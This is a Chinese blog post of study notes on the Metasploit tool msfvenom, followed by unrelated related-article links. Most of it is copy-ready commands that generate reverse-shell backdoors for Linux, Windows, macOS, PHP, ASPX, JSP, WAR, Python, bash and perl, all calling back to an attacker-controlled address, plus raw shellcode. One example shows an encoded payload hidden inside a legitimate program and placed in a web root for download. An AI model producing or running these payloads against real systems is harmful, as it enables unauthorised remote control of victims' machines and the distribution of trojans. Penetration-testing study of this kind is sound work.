• msfvenom学习笔记


    msfvenom学习笔记

    来源于啊B的这个视频的学习笔记,但是讲的很乱
    在这里插入图片描述

    什么是msfvenom?

    msfvenom是msfpayload和msfencode的组合,将这两个工具集成在一个框架实例中,就是msfvenom。

    msfvenom是用来生成后门的软件,在目标机器上执行后门后,在本地监听就能上线shell。

    msfvenom常见参数

    在这里插入图片描述

    msfvenom生成可执行文件payload

    linux

    msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.80.130 LPORT=8088 -f elf > shell.elf

    windows

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.80.130 LPORT=8088 -f exe > shell.exe

    mac

    msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.80.130 LPORT=8088 -f macho > shell.macho

    例子

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.80.130 LPORT=5445 -x /root/Desktop/StampRemover.exe x86/shikata_ga_nai -f exe -o /var/www/html/heellloo.exe

    含义:msfvenom可以帮助我们从大量的metasploit有效负载中创建需要的负载,合并到利用程序中。这里使用的编码(-e x86/shikata_ga_nai)的payload ( windows/meterpreter/reverse_tcp),要回连的主机和端口( lhostlport )、模板文件(-x /root/Desktop/StampRemocer.exe )、都会整合到/var/www/html/heello.exe中。

    msfvenom生成各种语言payload

    php

    msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.80.130 LPORT=5443 -f raw > shell.php

    aspx

    msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.80.130 LPORT=5443 -f aspx -o shell.aspx

    jsp

    msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.80.130 LPORT=5445 -f raw > shell.jsp

    java

    msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.80.130 LPORT=5445 -f war > shell.war

    python

    msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.80.130 LPORT=5443 -f raw > shell.py

    bash

    msfvenom -p cmd/unix/reverse_bash LHOST=192.168.80.130 LPORT=5443 -f raw > shell.sh

    perl

    msfvenom -p cmd/unix/reverse_perl LHOST=192.168.80.130 LPORT=5443 -f raw > shell.pl

    msfvenom生成shellcode

    windows

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.80.130 LPORT=5445 -f c

    linux

    msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.80.130 LPORT=5445 -f c

    mac

    msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.80.130 LPORT=5445 -f c

    msfvenom几个监听的参数介绍

    在这里插入图片描述

  • 相关阅读:
    Shell基础练习2
    瑞意教育集团阳光助学 军训展风采 青春正当时2024级新生军训圆满落幕
    Linux删除文件后没有释放空间解决办法
    【草料】uni-app ts vue 小程序 如何如何通过草料生成对应的模块化二维码
    docker安装部署实战详细手册
    解决:PowerDesigne找不到右边表的工具栏
    Linux pipe()系统调用示例
    IDEA 对单个的java class文件打成jar包
    Midjourney视觉垫图
    百题千解计划【CSDN每日一练】订班服(附解析+多种实现方法:Python、Java、C、C++、C#、Go、JavaScript)
  • 原文地址:https://blog.csdn.net/zr1213159840/article/details/125470939